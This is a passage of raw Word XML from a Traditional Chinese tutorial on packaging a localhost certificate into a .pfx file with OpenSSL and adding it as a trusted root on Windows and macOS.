            </w:r>
            <w:r w:rsidR="00CF29AC" w:rsidRPr="00DC0584">
              <w:rPr>
                <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>ca</w:t>
            </w:r>
            <w:r w:rsidRPr="00DC058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.pfx</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="612652F1" w14:textId="77777777" w:rsidR="0098676C" w:rsidRPr="00DC0584" w:rsidRDefault="0098676C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1648C404" w14:textId="77777777" w:rsidR="0098676C" w:rsidRPr="00DC0584" w:rsidRDefault="007247F3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC0584">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Enter Export Password: </w:t>
      </w:r>
      <w:r w:rsidRPr="00DC0584">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>123456</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0094867A" w14:textId="77777777" w:rsidR="0098676C" w:rsidRPr="00DC0584" w:rsidRDefault="007247F3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC0584">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Verifying - Enter Export Password: </w:t>
      </w:r>
      <w:r w:rsidRPr="00DC0584">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>123456</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF7B290" w14:textId="77777777" w:rsidR="0098676C" w:rsidRPr="00DC0584" w:rsidRDefault="0098676C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="258A19A7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使用 OpenSSL 工具的一個命令，用於將數字證書和私鑰打包成一個 .pfx 文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E06EAB8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參數的含義：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A676086" w14:textId="77777777" w:rsidR="0098676C" w:rsidRPr="00DC0584" w:rsidRDefault="007247F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>-export</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC0584">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="Arial Unicode MS"/>
          <w:color w:val="374151"/>
        </w:rPr>
        <w:t>：指示要進行打包操作。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AEEB9B0" w14:textId="50BA7C0F" w:rsidR="0098676C" w:rsidRPr="00DC0584" w:rsidRDefault="007247F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 xml:space="preserve">-in </w:t>
      </w:r>
      <w:r w:rsidR="00925827">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
          <w:color w:val="374151"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>web_cert</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC0584">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
          <w:color w:val="374151"/>
        </w:rPr>
        <w:t>.crt</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC0584">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="Arial Unicode MS"/>
          <w:color w:val="374151"/>
        </w:rPr>
        <w:t>：指定要包含在 .pfx 文件中的數字證書文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135679F2" w14:textId="266ADE89" w:rsidR="0098676C" w:rsidRPr="00DC0584" w:rsidRDefault="007247F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 xml:space="preserve">-inkey </w:t>
      </w:r>
      <w:r w:rsidR="00925827">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
          <w:color w:val="374151"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>web_private</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC0584">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
          <w:color w:val="374151"/>
        </w:rPr>
        <w:t>.key</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC0584">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="Arial Unicode MS"/>
          <w:color w:val="374151"/>
        </w:rPr>
        <w:t>：指定要包含在 .pfx 文件中的私鑰文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7790E6B1" w14:textId="3C0B2D25" w:rsidR="0098676C" w:rsidRPr="00DC0584" w:rsidRDefault="007247F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color w:val="374151"/>
        </w:rPr>
        <w:t xml:space="preserve">-out </w:t>
      </w:r>
      <w:r w:rsidR="009B24BA">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
          <w:color w:val="374151"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>web_ca</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC0584">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
          <w:color w:val="374151"/>
        </w:rPr>
        <w:t>.pfx</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC0584">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="Arial Unicode MS"/>
          <w:color w:val="374151"/>
        </w:rPr>
        <w:t>：指定輸出的 .pfx 文件的名稱。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CEF13D5" w14:textId="52C855EE" w:rsidR="0098676C" w:rsidRDefault="0098676C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79C70DF2" w14:textId="77777777" w:rsidR="004D2172" w:rsidRPr="00E1413B" w:rsidRDefault="004D2172" w:rsidP="004D2172">
      <w:pPr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PKCS#12 是 Public-Key Cryptography Standards (公鑰密碼學標準) 的第 12 份標準，由 RSA Data Security, Inc. 所發布。它描述了一種為存儲多個憑證和私鑰的格式。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E39AFE0" w14:textId="09ECB727" w:rsidR="004D2172" w:rsidRPr="00E1413B" w:rsidRDefault="004D2172" w:rsidP="004D2172">
      <w:pPr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"PKCS" 中的 "#12" 指的是該標準系列中的特定標準。而這個系列包含多個不同的標準，每個都涵蓋了密碼學中的不同部分。例如：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="561CCE2F" w14:textId="77777777" w:rsidR="004D2172" w:rsidRPr="00E1413B" w:rsidRDefault="004D2172" w:rsidP="004D2172">
      <w:pPr>
        <w:pStyle w:val="afb"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PKCS#1：描述了 RSA 加密標準。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1EC88D" w14:textId="77777777" w:rsidR="004D2172" w:rsidRPr="00E1413B" w:rsidRDefault="004D2172" w:rsidP="004D2172">
      <w:pPr>
        <w:pStyle w:val="afb"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PKCS#7：描述了一種用於加密和數字簽名的消息語法。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A009D24" w14:textId="77777777" w:rsidR="004D2172" w:rsidRPr="00E1413B" w:rsidRDefault="004D2172" w:rsidP="004D2172">
      <w:pPr>
        <w:pStyle w:val="afb"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PKCS#10：描述了證書簽名請求（CSR）的格式。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A956154" w14:textId="049958B4" w:rsidR="004D2172" w:rsidRPr="00E1413B" w:rsidRDefault="004D2172" w:rsidP="004D2172">
      <w:pPr>
        <w:pStyle w:val="afb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E1413B">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>PKCS#12：描述了一種為存儲多個憑證和私鑰的格式。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD88BD9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1AD94E04" w14:textId="77777777" w:rsidR="009D14BB" w:rsidRDefault="009D14BB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
          <w:color w:val="434343"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</w:p>
    <w:p w14:paraId="7079E9E2" w14:textId="7D5AAE2F" w:rsidR="0098676C" w:rsidRPr="00DC0584" w:rsidRDefault="007247F3" w:rsidP="008D3FEF">
      <w:pPr>
        <w:pStyle w:val="3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lastRenderedPageBreak/>
        <w:t>九、加入根憑證</w:t>
      </w:r>
      <w:r w:rsidR="00B81FC0">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>到系統</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC0584">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD87BC9" w14:textId="0F9D2C18" w:rsidR="00F7367E" w:rsidRDefault="00F7367E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</w:rPr>
        <w:t>加入到根憑證（f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>or Windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E66640B" w14:textId="77777777" w:rsidR="008735B4" w:rsidRPr="008735B4" w:rsidRDefault="008735B4" w:rsidP="008735B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008735B4">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>請以「系統管理員身分」執行以下命令，即可將憑證匯入到 Windows 的憑證儲存區之中：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735B4" w:rsidRPr="00EF3D39" w14:paraId="2A96227E" w14:textId="77777777" w:rsidTr="008735B4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9019" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1BD3E21D" w14:textId="2A41CBB4" w:rsidR="008735B4" w:rsidRPr="008735B4" w:rsidRDefault="008735B4" w:rsidP="008735B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008735B4">
              <w:rPr>
                <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">certutil -addstore -f "ROOT" </w:t>
            </w:r>
            <w:r w:rsidRPr="008735B4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web_cert.crt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="77E9E4F0" w14:textId="1E36280E" w:rsidR="00F7367E" w:rsidRDefault="00F7367E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72596AA9" w14:textId="3ED96AA5" w:rsidR="00AA279C" w:rsidRPr="00AA279C" w:rsidRDefault="008650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尋找憑證（f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>or Windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）：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65007" w:rsidRPr="00EF3D39" w14:paraId="1A94EE1D" w14:textId="77777777" w:rsidTr="00865007">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9019" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0A708B19" w14:textId="6CF44210" w:rsidR="00865007" w:rsidRDefault="00865007">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00865007">
              <w:rPr>
                <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">certutil -store -v | findstr </w:t>
            </w:r>
            <w:r w:rsidRPr="00865007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"localhost2023"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="682A03CF" w14:textId="01C2C279" w:rsidR="00865007" w:rsidRPr="00AA279C" w:rsidRDefault="0070593F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>注意：</w:t>
      </w:r>
      <w:r w:rsidR="00AA279C" w:rsidRPr="00AA279C">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>l</w:t>
      </w:r>
      <w:r w:rsidR="00AA279C" w:rsidRPr="00AA279C">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">ocalhost2023 </w:t>
      </w:r>
      <w:r w:rsidR="00AA279C" w:rsidRPr="00AA279C">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>是憑證名，</w:t>
      </w:r>
      <w:r w:rsidR="0058279C">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r w:rsidR="00AA279C" w:rsidRPr="00AA279C">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>設定在</w:t>
      </w:r>
      <w:r w:rsidR="00AA279C" w:rsidRPr="00AA279C">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> ssl.conf </w:t>
      </w:r>
      <w:r w:rsidR="00AA279C" w:rsidRPr="00AA279C">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>檔案內的</w:t>
      </w:r>
      <w:r w:rsidR="00AA279C" w:rsidRPr="00AA279C">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> CN = </w:t>
      </w:r>
      <w:r w:rsidR="00AA279C" w:rsidRPr="00AA279C">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>l</w:t>
      </w:r>
      <w:r w:rsidR="00AA279C" w:rsidRPr="00AA279C">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ocalhost2023</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002DC22B" w14:textId="77777777" w:rsidR="00AA279C" w:rsidRPr="00865007" w:rsidRDefault="00AA279C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FF84827" w14:textId="4C80A4FF" w:rsidR="00F7367E" w:rsidRDefault="00F7367E" w:rsidP="00F7367E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</w:rPr>
        <w:t>加入到根憑證（f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>or Mac</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>）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EF3D39" w14:paraId="704967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0728" w14:textId="3D48C413" w:rsidR="0098676C" w:rsidRPr="00D26EBA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18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D26EBA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  <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">sudo security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain </w:t>
            </w:r>
            <w:r w:rsidR="00332A3D" w:rsidRPr="00D26EBA">
              <w:rPr>
                <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:highlight w:val="white"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>web_cert</w:t>
            </w:r>
            <w:r w:rsidRPr="00D26EBA">
              <w:rPr>
                <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:highlight w:val="white"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.crt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4B089E96" w14:textId="1456E968" w:rsidR="0098676C" w:rsidRPr="00EB0162" w:rsidRDefault="007247F3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC0584">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="Arial Unicode MS"/>
        </w:rPr>
        <w:t xml:space="preserve">若有出現 password: </w:t>
      </w:r>
      <w:r w:rsidR="004451E8" w:rsidRPr="004451E8">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="Arial Unicode MS" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF23EC"/>
        </w:rPr>
        <w:t>輸入</w:t>
      </w:r>
      <w:r w:rsidR="000725C7" w:rsidRPr="000725C7">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="Arial Unicode MS" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF23EC"/>
        </w:rPr>
        <w:t>你的</w:t>
      </w:r>
      <w:r w:rsidRPr="000725C7">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="Arial Unicode MS"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF23EC"/>
        </w:rPr>
        <w:t>mac 的密碼</w:t>
      </w:r>
      <w:r w:rsidR="002B6EDA" w:rsidRPr="00EB0162">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="Arial Unicode MS" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>（注意：</w:t>
      </w:r>
      <w:r w:rsidR="002B6EDA" w:rsidRPr="00EB0162">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="Arial Unicode MS" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>不是</w:t>
      </w:r>
      <w:r w:rsidR="002B6EDA" w:rsidRPr="00EB0162">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="Arial Unicode MS" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>輸入憑證密碼：</w:t>
      </w:r>
      <w:r w:rsidR="002B6EDA" w:rsidRPr="00EB0162">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="Arial Unicode MS"/>
          <w:strike/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>123456</w:t>
      </w:r>
      <w:r w:rsidR="002B6EDA" w:rsidRPr="00EB0162">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="Arial Unicode MS" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="781EDEDD" w14:textId="77777777" w:rsidR="007309CF" w:rsidRDefault="007309CF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24B8CDF7" w14:textId="26B1CC83" w:rsidR="0098676C" w:rsidRDefault="007309CF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</w:rPr>
        <w:t>尋找憑證</w:t>
      </w:r>
      <w:r w:rsidR="004D01E5">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（f</w:t>
      </w:r>
      <w:r w:rsidR="004D01E5">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>or Mac</w:t>
      </w:r>
      <w:r w:rsidR="004D01E5">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>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E4167" w:rsidRPr="00EF3D39" w14:paraId="50EDF9F3" w14:textId="77777777" w:rsidTr="008E4167">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9019" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="15253EFC" w14:textId="691B387F" w:rsidR="008E4167" w:rsidRPr="008E4167" w:rsidRDefault="008E4167">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008E4167">
              <w:rPr>
                <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">security find-certificate -c </w:t>
            </w:r>
            <w:r w:rsidRPr="00865007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"localhost</w:t>
            </w:r>
            <w:r w:rsidR="001B33C8" w:rsidRPr="00865007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2023</w:t>
            </w:r>
            <w:r w:rsidRPr="00865007">
              <w:rPr>
                <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
                <w:b/>
                <w:bCs/>
